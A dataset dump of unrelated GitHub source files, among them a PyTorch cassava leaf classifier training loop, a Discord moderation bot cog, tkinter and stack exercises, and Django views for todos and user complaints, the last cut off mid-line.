current_in_progress, \"completed\": current_completed, \"categorized_todos\": categorized_todos})\n","repo_name":"Christiantav/todo-app","sub_path":"todoapp/todolist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30302826568","text":"import time\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport utils\nfrom sklearn import model_selection\nfrom torch.optim import SGD, Adam\nfrom torch.optim.lr_scheduler import (\n CosineAnnealingLR,\n CosineAnnealingWarmRestarts,\n ReduceLROnPlateau,\n)\nfrom torch.utils.data import DataLoader\n\nfrom cassava import config, loss\nfrom cassava.augment import get_transforms\nfrom cassava.dataset import TestDataset, TrainDataset\nfrom cassava.model import CassavaClassifier\nfrom cassava.train import train_fn\nfrom cassava.valid import valid_fn\n\n# # Initializations\nOUTPUT_DIR = \"/\"\ntrain = pd.read_csv(\"data/train.csv\")\n\nLOGGER = utils.init_logger()\nutils.seed_torch(config.SEED)\n\n# Creating CV Strategy\nfolds = train.copy()\nfold_strategy = model_selection.StratifiedKFold(\n n_splits=config.N_FOLD, shuffle=True, random_state=config.SEED\n)\nfor n, (train_index, val_index) in enumerate(fold_strategy.split(folds, folds[config.TARGET_COL])):\n folds.loc[val_index, \"fold\"] = int(n)\nfolds[\"fold\"] = folds[\"fold\"].astype(int)\n\ndevice = torch.device(\"gpu\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef train_loop(folds, fold):\n\n LOGGER.info(f\"========== fold: {fold} training ==========\")\n\n # ====================================================\n # loader\n # ====================================================\n trn_idx = folds[folds[\"fold\"] != fold].index\n val_idx = folds[folds[\"fold\"] == fold].index\n\n train_folds = folds.loc[trn_idx].reset_index(drop=True)\n valid_folds = folds.loc[val_idx].reset_index(drop=True)\n\n train_dataset = TrainDataset(train_folds, transform=get_transforms(data=\"train\"))\n valid_dataset = TrainDataset(valid_folds, transform=get_transforms(data=\"valid\"))\n\n train_loader = DataLoader(\n train_dataset,\n batch_size=config.BATCH_SIZE,\n shuffle=True,\n num_workers=config.NUM_WORKERS,\n pin_memory=True,\n drop_last=True,\n )\n valid_loader = DataLoader(\n valid_dataset,\n batch_size=config.BATCH_SIZE,\n shuffle=False,\n num_workers=config.NUM_WORKERS,\n pin_memory=True,\n drop_last=False,\n )\n\n # ====================================================\n # scheduler\n # ====================================================\n def get_scheduler(optimizer):\n if config.SCHEDULER == \"ReduceLROnPlateau\":\n scheduler = ReduceLROnPlateau(\n optimizer,\n mode=\"min\",\n factor=config.factor,\n patience=config.patience,\n verbose=True,\n eps=config.eps,\n )\n elif config.SCHEDULER == \"CosineAnnealingLR\":\n scheduler = CosineAnnealingLR(\n optimizer, T_max=config.T_max, eta_min=config.MIN_LR, last_epoch=-1\n )\n elif config.SCHEDULER == \"CosineAnnealingWarmRestarts\":\n scheduler = CosineAnnealingWarmRestarts(\n optimizer, T_0=config.T_0, T_mult=1, eta_min=config.MIN_LR, last_epoch=-1\n )\n return scheduler\n\n # ====================================================\n # model & optimizer\n # ====================================================\n model = CassavaClassifier(config.MODEL_NAME, pretrained=True)\n model.to(device)\n\n optimizer = Adam(\n model.parameters(), lr=config.LR, weight_decay=config.WEIGHT_DECAY, amsgrad=False\n )\n scheduler = get_scheduler(optimizer)\n\n # ====================================================\n # apex\n # ====================================================\n if config.APEX:\n from apex import amp\n\n model, optimizer = amp.initialize(model, optimizer, opt_level=\"O1\", verbosity=0)\n\n def get_criterion():\n if config.CRITERION == \"CrossEntropyLoss\":\n criterion = nn.CrossEntropyLoss()\n elif config.CRITERION == \"FocalCosineLoss\":\n criterion = loss.FocalCosineLoss()\n elif config.CRITERION == \"BiTemperedLoss\":\n criterion = loss.BiTemperedLogisticLoss(\n t1=config.t1, t2=config.t2, smoothing=config.smoothing\n )\n return criterion\n\n # ====================================================\n # loop\n # ====================================================\n criterion = get_criterion()\n LOGGER.info(f\"Criterion: {criterion}\")\n\n best_score = 0.0\n\n for epoch in range(config.EPOCHS):\n\n start_time = time.time()\n\n # train\n avg_loss = train_fn(train_loader, model, criterion, optimizer, epoch, scheduler, device)\n\n # eval\n avg_val_loss, preds = valid_fn(valid_loader, model, criterion, device)\n valid_labels = valid_folds[config.TARGET_COL].values\n\n if isinstance(scheduler, ReduceLROnPlateau):\n scheduler.step(avg_val_loss)\n elif isinstance(scheduler, CosineAnnealingLR):\n scheduler.step()\n elif isinstance(scheduler, CosineAnnealingWarmRestarts):\n scheduler.step()\n\n # scoring\n score = utils.get_score(valid_labels, preds.argmax(1))\n\n elapsed = time.time() - start_time\n\n LOGGER.info(\n f\"Epoch {epoch+1} - avg_train_loss: {avg_loss:.4f} avg_val_loss: {avg_val_loss:.4f} time: {elapsed:.0f}s\"\n )\n LOGGER.info(f\"Epoch {epoch+1} - Accuracy: {score}\")\n\n if score > best_score:\n best_score = score\n LOGGER.info(f\"Epoch {epoch+1} - Save Best Score: {best_score:.4f} Model\")\n torch.save(\n {\"model\": model.state_dict(), \"preds\": preds},\n OUTPUT_DIR + f\"{config.MODEL_NAME}_fold{fold}_best.pth\",\n )\n\n check_point = torch.load(OUTPUT_DIR + f\"{config.MODEL_NAME}_fold{fold}_best.pth\")\n valid_folds[[str(c) for c in range(5)]] = check_point[\"preds\"]\n valid_folds[\"preds\"] = check_point[\"preds\"].argmax(1)\n\n return valid_folds\n\n\ndef main():\n\n \"\"\"\n Prepare: 1.train 2.test 3.submission 4.folds\n \"\"\"\n\n def get_result(result_df):\n preds = result_df[\"preds\"].values\n labels = result_df[config.TARGET_COL].values\n score = utils.get_score(labels, preds)\n LOGGER.info(f\"Score: {score:<.5f}\")\n\n if config.train:\n # train\n oof_df = pd.DataFrame()\n for fold in range(config.n_fold):\n if fold in config.trn_fold:\n _oof_df = train_loop(folds, fold)\n oof_df = pd.concat([oof_df, _oof_df])\n LOGGER.info(f\"========== fold: {fold} result ==========\")\n get_result(_oof_df)\n # CV result\n LOGGER.info(\"========== CV ==========\")\n get_result(oof_df)\n # save result\n oof_df.to_csv(OUTPUT_DIR + \"oof_df.csv\", index=False)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"p-s-vishnu/cassava-leaf-disease-classification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6807,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"23985003713","text":"#암호화와 복호화\n#암호화\nplain_text=input('암호화할 문장을 입력하시오(영어): ')\nq=input('암호화를 진행합니까?(예/아니오): ')\nencryted_text=\"\"\nif q==\"예\":\n for a in plain_text:\n x=ord(a)\n x+=1\n y=chr(x)\n encryted_text+=y\n\nelse:\n print('암호화/복호화 프로그램을 종료합니다')\n\n#암호문 완성\nprint(encryted_text)\nanswer_text=\"\"\nq2=input('이어서 복호화를 진행하시겠습니까?(예/아니오): ')\n\n\n#복호화\nif q2==\"예\":\n for b in encryted_text:\n x1=ord(b)\n x1-=1\n y1=chr(x1)\n answer_text+=y1\n print(answer_text)\n print('암호화/복호화가 완료되었습니다.')\n\nelse:\n print('암호화가 완료되었습니다.')","repo_name":"ysjin0715/python-practice","sub_path":"chapter8/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10127186169","text":"from tkinter import * # gui tkinter 사용\n\nroot = Tk()\nroot.title('gui title') # 제목\nroot.geometry('640x480') # 가로 * 세로\n''' 아무런 변화가 없다 이유는 메뉴만 설정하고 메뉴에 대한 값을 설정하지 않았다\nmenu = Menu(root)\n\nroot.config(menu=menu)\nroot.mainloop()\n'''\ndef create_new_file():\n print('새 파일을 만듭니다.')\n\nmenu = Menu(root)\n\n# File 메뉴\nmenu_file = Menu(menu, tearoff=0)\nmenu_file.add_command(label='New File', command=create_new_file)\nmenu_file.add_command(label='New Window')\nmenu_file.add_separator() # 구분자\nmenu_file.add_command(label='Open File...')\nmenu_file.add_separator() # 구분자\nmenu_file.add_command(label='Save All', state='disable') # 비활성화\nmenu_file.add_separator() # 구분자\nmenu_file.add_command(label='Exit', command=root.quit) # 종료\n\nmenu.add_cascade(label='File', menu=menu_file)\n\n# Edit 메뉴 (빈 값)\nmenu.add_cascade(label='Edit')\n\n# Language 메뉴 (radio 버튼을 통해서 택1)\nmenu_lang = Menu(menu, tearoff=0)\nmenu_lang.add_radiobutton(label='Python')\nmenu_lang.add_radiobutton(label='Java')\nmenu_lang.add_radiobutton(label='C++')\nmenu.add_cascade(label='Language', menu=menu_lang)\n\n# View 메뉴 (checkbutton 버튼을 통해서 여러가지 택)\nmenu_view = Menu(menu, tearoff=0)\nmenu_view.add_checkbutton(label='Show Minimap')\nmenu_view.add_checkbutton(label='Show Breadcrumbs')\nmenu.add_cascade(label='View', menu=menu_view)\n\nroot.config(menu=menu)\nroot.mainloop()","repo_name":"leedokchidok19/study-python","sub_path":"gui/gui_basic/10_menu.py","file_name":"10_menu.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16017202190","text":"from stack_implementation import Stack\r\n\r\ndef dec_to_bin(dec_num):\r\n rs = Stack()\r\n while dec_num>0:\r\n r = dec_num%2\r\n rs.push(r)\r\n dec_num = dec_num//2\r\n \r\n return_str = \"\"\r\n while not rs.isEmpty():\r\n return_str = return_str + str(rs.pop())\r\n \r\n return return_str\r\n\r\ndef dec_to_other_base(dec_num, base):\r\n digits = \"0123456789ABCDEF\"\r\n rs = Stack()\r\n while dec_num>0:\r\n r = dec_num%base\r\n rs.push(r)\r\n dec_num = dec_num//base\r\n \r\n return_str = \"\"\r\n while not rs.isEmpty():\r\n return_str = return_str + digits[rs.pop()]\r\n \r\n return return_str\r\n\r\n\r\n\r\n#print(dec_to_bin(233))\r\n\r\n#print(dec_to_other_base(255,16))","repo_name":"krzysieknaw/Algorithms_and_Data_Structures","sub_path":"data_structures/stack_bin_to_dec.py","file_name":"stack_bin_to_dec.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31072925064","text":"import os\nimport discord\nimport json\nfrom discord.ext import commands\nfrom datetime import datetime, timedelta\nimport time\n\nfrom .utils import *\n\n\nclass Data(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n async def update_data(self, guilds, guild: discord.Guild):\n id = str(guild.id)\n\n if not id in guilds:\n # if the guild is not saved create guild object\n guilds[id] = {}\n guilds[id][\"setup_complete\"] = False\n guilds[id][\"notified\"] = False\n guilds[id][\"scre_enable\"] = True\n guilds[id][\"verbose_enable\"] = False\n guilds[id][\"late_enable\"] = False\n guilds[id][\"auto_enable\"] = False\n guilds[id][\"strict_enable\"] = False\n guilds[id][\"chnl_notify\"] = 0\n guilds[id][\"chnl_approve\"] = 0\n guilds[id][\"chnl_approve_voice\"] = 0\n guilds[id][\"role_approve\"] = 0\n guilds[id][\"role_member\"] = 0\n guilds[id][\"role_silence\"] = 0\n guilds[id][\"banned_members\"] = {}\n return\n\n if not \"setup_complete\" in guilds[id]:\n guilds[id][\"setup_complete\"] = False\n if not \"notified\" in guilds[id]:\n guilds[id][\"notified\"] = False\n if not \"scre_enable\" in guilds[id]:\n guilds[id][\"scre_enable\"] = False\n if not \"verbose_enable\" in guilds[id]:\n guilds[id][\"verbose_enable\"] = False\n if not \"late_enable\" in guilds[id]:\n guilds[id][\"late_enable\"] = False\n if not \"auto_enable\" in guilds[id]:\n guilds[id][\"auto_enable\"] = False\n if not \"strict_enable\" in guilds[id]:\n guilds[id][\"strict_enable\"] = False\n if not \"chnl_notify\" in guilds[id]:\n guilds[id][\"chnl_notify\"] = 0\n if not \"chnl_approve\" in guilds[id]:\n guilds[id][\"chnl_approve\"] = 0\n if not \"chnl_approve_voice\" in guilds[id]:\n guilds[id][\"chnl_approve_voice\"] = 0\n if not \"role_approve\" in guilds[id]:\n guilds[id][\"role_approve\"] = 0\n if not \"role_member\" in guilds[id]:\n guilds[id][\"role_member\"] = 0\n if not \"role_silence\" in guilds[id]:\n guilds[id][\"role_member\"] = 0\n if not \"banned_members\" in guilds[id]:\n guilds[id][\"banned_members\"] = {}\n\n async def update_banned_member(\n self, guilds, guild, member: discord.User, time: int = 0\n ):\n id = str(guild.id)\n\n if not str(member.id) in guilds[id][\"banned_members\"]:\n guilds[id][\"banned_members\"][str(member.id)] = {}\n\n guilds[id][\"banned_members\"][str(member.id)][\"time\"] = time\n\n async def update_ban_timer(self, guilds, guild, member: discord.User):\n id = str(guild.id)\n\n guilds[id][\"banned_members\"][str(member.id)][\"time\"] -= 1\n\n async def get_ban_timer(self, guilds, guild, member: discord.User):\n id = str(guild.id)\n\n return guilds[id][\"banned_members\"][str(member.id)][\"time\"]\n\n async def delete_banned_member(self, guilds, guild, member: discord.User):\n id = str(guild.id)\n\n del guilds[id][\"banned_members\"][str(member.id)]\n\n async def update_id_channel(\n self, guilds, guild, channel: discord.channel.TextChannel, type: str\n ):\n id = str(guild.id)\n\n if id in guilds:\n guilds[id][type] = channel.id\n\n async def update_id_role(self, guilds, guild, role: discord.Role, type: str):\n id = str(guild.id)\n\n if id in guilds:\n guilds[id][type] = role.id\n\n async def update_state_config(self, guilds, guild, cfg: str, state: bool):\n id = str(guild.id)\n\n if id in guilds:\n guilds[id][cfg] = state\n\n async def get_state_config(self, guilds, guild, cfg: str):\n id = str(guild.id)\n\n if id in guilds:\n return guilds[id][cfg]\n\n async def update_data_user(self, members, member: discord.Member):\n id = str(member.id)\n\n if not id in members:\n # if the user is not saved create user object\n members[id] = {}\n members[id][\"checked\"] = False\n members[id][\"flag_approve\"] = False\n members[id][\"score\"] = 0.0\n\n members[id][\"approval\"] = {}\n members[id][\"approval\"][\"days\"] = 0\n members[id][\"approval\"][\"checks\"] = 0\n members[id][\"approval\"][\"score\"] = 0\n members[id][\"approval\"][\"start_date\"] = 0\n members[id][\"approval\"][\"static\"] = 0\n\n if not \"checked\" in members[id]:\n members[id][\"checked\"] = False\n if not \"flag_approve\" in members[id]:\n members[id][\"flag_approve\"] = False\n if not \"score\" in members[id]:\n members[id][\"score\"] = 0.0\n\n if not \"approval\" in members[id]:\n members[id][\"approval\"] = {}\n if not \"days\" in members[id][\"approval\"]:\n members[id][\"approval\"][\"days\"] = 0\n if not \"checks\" in members[id][\"approval\"]:\n members[id][\"approval\"][\"checks\"] = 0\n if not \"score\" in members[id][\"approval\"]:\n members[id][\"approval\"][\"score\"] = 0\n if not \"start_date\" in members[id][\"approval\"]:\n members[id][\"approval\"][\"start_date\"] = 0\n if not \"static\" in members[id][\"approval\"]:\n members[id][\"approval\"][\"static\"] = 0\n\n async def update_state_user(self, members, member, name: str, state):\n id = str(member.id)\n\n members[id][name] = state\n\n async def update_state_user_approval(self, members, member, name: str, state):\n id = str(member.id)\n\n members[id][\"approval\"][name] = state\n\n @commands.command(pass_context=True)\n @commands.has_permissions(administrator=True)\n async def create_channel(self, ctx, name: str, cfg: str, type: str, embed):\n guild = ctx.message.guild\n\n # get existing channel\n channel_existing = discord.utils.get(\n self.client.get_all_channels(), guild__name=ctx.guild.name, name=name,\n )\n\n # if there is an existing channel\n if channel_existing is not None:\n # update file\n guilds = json_load(data_guild)\n\n await self.update_id_channel(guilds, guild, channel_existing, cfg)\n\n json_save(guilds, data_guild)\n\n if embed is not None:\n embed.add_field(\n name=\"Updated existing channel\",\n value=\"`\" + name + \"`\",\n inline=False,\n )\n return\n else:\n # create channel\n if type == \"text\":\n await guild.create_text_channel(name)\n elif type == \"voice\":\n await guild.create_voice_channel(name)\n\n # get created channel\n channel = discord.utils.get(\n self.client.get_all_channels(), guild__name=ctx.guild.name, name=name,\n )\n\n # update file\n guilds = json_load(data_guild)\n\n await self.update_id_channel(guilds, guild, channel, cfg)\n\n json_save(guilds, data_guild)\n\n if embed is not None:\n embed.add_field(\n name=\"Created channel\", value=\"`\" + name + \"`\", inline=False\n )\n return\n\n @commands.command(pass_context=True)\n @commands.has_permissions(administrator=True)\n async def create_role(self, ctx, name: str, cfg: str, color: discord.Color, embed):\n guild = ctx.message.guild\n\n # get existing role\n role_existing = discord.utils.get(guild.roles, name=name)\n\n # if the role exists\n if role_existing is not None:\n # update file\n guilds = json_load(data_guild)\n\n await self.update_id_role(guilds, guild, role_existing, cfg)\n\n json_save(guilds, data_guild)\n\n if embed is not None:\n embed.add_field(\n name=\"Updated existing role\",\n value=role_existing.mention,\n inline=False,\n )\n return\n else:\n # create role\n await guild.create_role(name=name, color=color)\n\n # get created role\n role = discord.utils.get(guild.roles, name=name)\n\n # update file\n guilds = json_load(data_guild)\n\n await self.update_id_role(guilds, guild, role, cfg)\n\n json_save(guilds, data_guild)\n\n if embed is not None:\n embed.add_field(name=\"Created role\", value=role.mention, inline=False)\n return\n\n @commands.command(pass_context=True)\n @commands.has_permissions(administrator=True)\n async def update_perms(self, ctx, guild: discord.Guild, embed: discord.Embed):\n # update file\n guilds = json_load(data_guild)\n\n approve_id = guilds[str(guild.id)][\"role_approve\"]\n member_id = guilds[str(guild.id)][\"role_member\"]\n ch_approve_id = guilds[str(guild.id)][\"chnl_approve\"]\n ch_approve_voice_id = guilds[str(guild.id)][\"chnl_approve_voice\"]\n\n json_save(guilds, data_guild)\n\n approve_role = discord.utils.get(guild.roles, id=approve_id)\n member_role = discord.utils.get(guild.roles, id=member_id)\n\n approve_channel = discord.utils.get(\n self.client.get_all_channels(), guild__name=guild.name, id=ch_approve_id,\n )\n approve_voice_channel = discord.utils.get(\n self.client.get_all_channels(),\n guild__name=guild.name,\n id=ch_approve_voice_id,\n )\n\n text_channel_list = []\n voice_channel_list = []\n\n for channel in guild.text_channels:\n text_channel_list.append(channel)\n for channel in guild.voice_channels:\n voice_channel_list.append(channel)\n\n for ch in text_channel_list:\n if ch.overwrites_for(approve_role).read_messages != False:\n await ch.set_permissions(\n approve_role, read_messages=False, read_message_history=False\n )\n time.sleep(1)\n\n for ch_v in voice_channel_list:\n if ch_v.overwrites_for(approve_role).view_channel != False:\n await ch_v.set_permissions(\n approve_role, view_channel=False, speak=False\n )\n time.sleep(1)\n\n await approve_channel.set_permissions(\n approve_role, view_channel=True, read_message_history=False\n )\n time.sleep(1)\n if approve_channel.overwrites_for(member_role).view_channel != False:\n await approve_channel.set_permissions(\n member_role, view_channel=False, read_message_history=False\n )\n\n await approve_voice_channel.set_permissions(\n approve_role, view_channel=True, speak=True, stream=True\n )\n time.sleep(1)\n if approve_voice_channel.overwrites_for(member_role).view_channel != False:\n await approve_voice_channel.set_permissions(\n member_role, view_channel=False, speak=False\n )\n\n if embed is not None:\n embed.add_field(\n name=\"Set all permissions\",\n value=\"Set permissions for manual approval channels\",\n inline=False,\n )\n return\n\n @commands.command(pass_context=True)\n @commands.has_permissions(administrator=True)\n async def init(self, ctx, args: str = \"\"):\n guild = ctx.message.guild\n role_set = False\n\n # update file\n guilds = json_load(data_guild)\n\n await self.update_data(guilds, guild)\n user_id = guilds[str(guild.id)][\"role_member\"]\n\n json_save(guilds, data_guild)\n\n # create embed\n embed_waiting = discord.Embed(title=\"Setup\", description=\"\", color=color_main)\n embed_waiting.add_field(\n name=\"Please wait\", value=\"Processing request...\", inline=False,\n )\n waiting_msg = None\n\n # create embed\n embed = discord.Embed(title=\"Setup\", description=\"\", color=color_done)\n\n def check(author):\n def inner_check(message):\n return message.author == author\n\n return inner_check\n\n # if user role is not set\n if user_id == 0:\n # create embed\n embed_brk = discord.Embed(title=\"Info\", description=\"\", color=color_done)\n embed_brk.add_field(\n name=\"No user role set\",\n value=\"Reply to this message with your role name to set it as a user role\",\n inline=False,\n )\n await ctx.send(embed=embed_brk)\n\n reply = await self.client.wait_for(\n \"message\", check=check(ctx.author), timeout=30\n )\n\n if reply is not None:\n content = reply.content\n\n # get existing role\n role_existing = discord.utils.get(guild.roles, name=content)\n\n role_everyone = guild.default_role\n\n if role_existing is not None or content == \"everyone\":\n # create embed\n embed = discord.Embed(\n title=\"Done!\", description=\"\", color=color_done\n )\n\n # update file\n guilds = json_load(data_guild)\n\n if content != \"everyone\":\n await self.update_id_role(\n guilds, guild, role_existing, \"role_member\"\n )\n elif content == \"everyone\":\n await self.update_id_role(\n guilds, guild, role_everyone, \"role_member\"\n )\n\n json_save(guilds, data_guild)\n\n if content != \"everyone\":\n embed.add_field(\n name=\"User role set as\",\n value=role_existing.mention,\n inline=False,\n )\n elif content == \"everyone\":\n embed.add_field(\n name=\"User role set as\", value=role_everyone, inline=False\n )\n\n role_done = await ctx.send(embed=embed)\n role_set = True\n time.sleep(2)\n await role_done.delete()\n waiting_msg = await ctx.send(embed=embed_waiting)\n else:\n # create embed\n embed = discord.Embed(\n title=\"Error\", description=\"\", color=color_errr\n )\n embed.add_field(\n name=\"Could not find role\", value=content, inline=False\n )\n await ctx.send(embed=embed)\n return\n\n if role_set:\n # create role\n await self.create_role(\n ctx, \"tao-approval\", \"role_approve\", color_warn, embed\n )\n\n # create channels\n await self.create_channel(\n ctx, \"tao-notifications\", \"chnl_notify\", \"text\", embed\n )\n await self.create_channel(\n ctx, \"tao-approve_manual\", \"chnl_approve\", \"text\", embed\n )\n await self.create_channel(\n ctx, \"tao-approve_voice\", \"chnl_approve_voice\", \"voice\", embed\n )\n\n await self.update_perms(ctx, guild, embed)\n\n embed.add_field(name=\"User role set\", value=\"Setup complete!\", inline=False)\n\n embed.add_field(\n name=\"WARNING\",\n value=\"User checks are `enabled` by default. Type `tao score -disable` to disable it.\",\n inline=False,\n )\n\n await waiting_msg.delete()\n\n # update file\n guilds = json_load(data_guild)\n\n await self.update_data(guilds, guild)\n await self.update_state_config(guilds, guild, \"setup_complete\", True)\n\n json_save(guilds, data_guild)\n\n await ctx.send(embed=embed)\n return\n elif not role_set and user_id != 0 and args == \"-reset\":\n # create role\n await self.create_role(\n ctx, \"tao-approval\", \"role_approve\", color_warn, embed\n )\n\n # create channels\n await self.create_channel(\n ctx, \"tao-notifications\", \"chnl_notify\", \"text\", embed\n )\n await self.create_channel(\n ctx, \"tao-approve_manual\", \"chnl_approve\", \"text\", embed\n )\n await self.create_channel(\n ctx, \"tao-approve_voice\", \"chnl_approve_voice\", \"voice\", embed\n )\n\n await self.update_perms(ctx, guild, embed)\n\n embed.add_field(name=\"Reset\", value=\"Reset complete!\", inline=False)\n\n await waiting_msg.delete()\n await ctx.send(embed=embed)\n return\n\n async def set_config(\n self, ctx, cfg: str = \"\", args: str = \"\", cfg_state: bool = False\n ):\n guild = ctx.guild\n\n if args == \"\":\n embed_errr = discord.Embed(title=\"Error\", description=\"\", color=color_errr)\n embed_errr.add_field(\n name=\"Invalid argument\",\n value=\"Available arguments: `-enable`, `-disable`\",\n inline=False,\n )\n if cfg_state:\n embed_errr.add_field(\n name=\"Current value\", value=\"`enabled`\", inline=False,\n )\n else:\n embed_errr.add_field(\n name=\"Current value\", value=\"`disabled`\", inline=False,\n )\n await ctx.send(embed=embed_errr)\n if args == \"-enable\":\n if cfg_state == True:\n embed_warn = discord.Embed(\n title=\"Info\", description=\"\", color=color_done\n )\n embed_warn.add_field(\n name=\"Already enabled\",\n value=\"This function has already been enabled\",\n inline=False,\n )\n await ctx.send(embed=embed_warn)\n elif cfg_state == False:\n # update file\n guilds = json_load(data_guild)\n\n await self.update_data(self, guilds, guild)\n if cfg == \"-score\":\n await self.update_state_config(\n self, guilds, guild, \"scre_enable\", True\n )\n elif cfg == \"-verbose\":\n await self.update_state_config(\n self, guilds, guild, \"verbose_enable\", True\n )\n elif cfg == \"-late\":\n await self.update_state_config(\n self, guilds, guild, \"late_enable\", True\n )\n elif cfg == \"-auto\":\n await self.update_state_config(\n self, guilds, guild, \"auto_enable\", True\n )\n elif cfg == \"-strict\":\n await self.update_state_config(\n self, guilds, guild, \"strict_enable\", True\n )\n\n json_save(guilds, data_guild)\n\n embed_done = discord.Embed(\n title=\"Done!\", description=\"\", color=color_done\n )\n embed_done.add_field(\n name=\"Enabled function\",\n value=\"Successfully enabled the function\",\n inline=False,\n )\n await ctx.send(embed=embed_done)\n elif args == \"-disable\":\n if cfg_state == False:\n embed_warn = discord.Embed(\n title=\"Info\", description=\"\", color=color_done\n )\n embed_warn.add_field(\n name=\"Already disabled\",\n value=\"This function has already been disabled\",\n inline=False,\n )\n await ctx.send(embed=embed_warn)\n elif cfg_state == True:\n # update file\n guilds = json_load(data_guild)\n\n await self.update_data(self, guilds, guild)\n if cfg == \"-score\":\n await self.update_state_config(\n self, guilds, guild, \"scre_enable\", False\n )\n elif cfg == \"-verbose\":\n await self.update_state_config(\n self, guilds, guild, \"verbose_enable\", False\n )\n elif cfg == \"-late\":\n await self.update_state_config(\n self, guilds, guild, \"late_enable\", False\n )\n elif cfg == \"-auto\":\n await self.update_state_config(\n self, guilds, guild, \"auto_enable\", False\n )\n elif cfg == \"-strict\":\n await self.update_state_config(\n self, guilds, guild, \"strict_enable\", False\n )\n\n json_save(guilds, data_guild)\n\n embed_done = discord.Embed(\n title=\"Done!\", description=\"\", color=color_done\n )\n embed_done.add_field(\n name=\"Disabled function\",\n value=\"Successfully disabled the function\",\n inline=False,\n )\n await ctx.send(embed=embed_done)\n\n @commands.command(pass_context=True)\n async def setup_notify(self, channel: discord.TextChannel):\n guild = channel.guild\n\n # update file\n guilds = json_load(data_guild)\n\n await self.update_data(self, guilds, guild)\n dont_send = guilds[str(guild.id)][\"notified\"]\n setup_complete = guilds[str(guild.id)][\"setup_complete\"]\n\n json_save(guilds, data_guild)\n\n if not dont_send and not setup_complete:\n embed_errr = discord.Embed(\n title=\"WARNING!\", description=\"\", color=color_errr\n )\n embed_errr.add_field(\n name=\"Tao has not been set up yet!\",\n value=\"Set Tao up using the command: `tao init`\",\n inline=False,\n )\n await channel.send(embed=embed_errr)\n\n # update file\n guilds = json_load(data_guild)\n\n await self.update_data(self, guilds, guild)\n await self.update_state_config(self, guilds, guild, \"notified\", True)\n\n json_save(guilds, data_guild)\n elif setup_complete:\n # update file\n guilds = json_load(data_guild)\n\n await self.update_data(self, guilds, guild)\n await self.update_state_config(self, guilds, guild, \"notified\", True)\n\n json_save(guilds, data_guild)\n\n\ndef setup(client):\n client.add_cog(Data(client))\n","repo_name":"0x16c3/tao","sub_path":"cogs/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":23235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17926238612","text":"from publicationapp.models import *\nfrom authapp.models import *\n\nfrom .forms import *\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import ListView, UpdateView, DeleteView, CreateView\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse, HttpResponseRedirect, HttpResponse\nfrom django.utils import timezone\nfrom django.utils.formats import localize\nfrom django.urls import reverse\n# from datetime import datetime\nfrom django.core.files.storage import FileSystemStorage\nfrom django.db.models.functions import Length\n\n# получение жалобы на пользователя или публикацию через ajax\n@csrf_exempt\ndef NewComplaint(request):\n if request.user.is_authenticated:\n if request.is_ajax():\n complaint = request.POST\n contacting_support = None\n\n # если обращение -- жалоба на публикацию\n if int(complaint['complaint_type']) == 11:\n pub_complaint = Publication.objects.get(id=complaint['complaint_id'])\n pub_complaint.save()\n contacting_support = ContactingSupport.objects.create(title=('Жалоба на публикацию «' + pub_complaint.title +'»'), type=ContactingSupportTypes.objects.get(id=11), asked_by=request.user, ask_content=complaint['complaint_text'], ask_additional_info=complaint['complaint_id'], when_asked=timezone.now())\n\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=1012200),\n preview = pub_complaint.get_preview,\n content = 'Ваша жалоба на публикацию «'+ pub_complaint.title +'» принята!',\n hover_text = \"Ждите ре��ультата здесь, в уведомлениях\"\n ).receiver.add(request.user)\n\n if pub_complaint.author:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=1012200),\n preview = pub_complaint.get_preview,\n content = 'На Вашу публикацию «'+ pub_complaint.title +'» поступила 1 новая жалоба.',\n hover_text = \"Ждите результата здесь, в уведомлениях\"\n ).receiver.add(pub_complaint.author)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=1012200),\n action_person = request.user,\n action_content = 'Жалоба на публикацию «'+ pub_complaint.title +'» от пользователя «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [pub_complaint «'+ pub_complaint.title +'» (id: '+ str(pub_complaint.id) +')]',\n )\n\n # если обращение -- жалоба на пользователя\n if int(complaint['complaint_type']) == 12:\n user_complaint = User.objects.get(id=complaint['complaint_id'])\n user_complaint.save()\n contacting_support = ContactingSupport.objects.create(title=('Жалоба на пользователя «' + user_complaint.username +'»'), type=ContactingSupportTypes.objects.get(id=12), asked_by=request.user, ask_content=complaint['complaint_text'], ask_additional_info=complaint['complaint_id'], when_asked=timezone.now())\n\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=1011200),\n preview = user_complaint.photo.name,\n content = 'Ваша жалоба на пользователя «'+ user_complaint.username +'» принята!',\n hover_text = \"Ждите результата здесь, в уведомлениях\"\n ).receiver.add(request.user)\n\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=1011200),\n content = 'На Ваш профиль поступила 1 новая жалоба.',\n hover_text = \"Ждите результата здесь, в уведомлениях\"\n ).receiver.add(user_complaint)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=1011200),\n action_person = request.user,\n action_content = 'Жалоба на пользователя «'+ user_complaint.username +'» от пользователя «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ 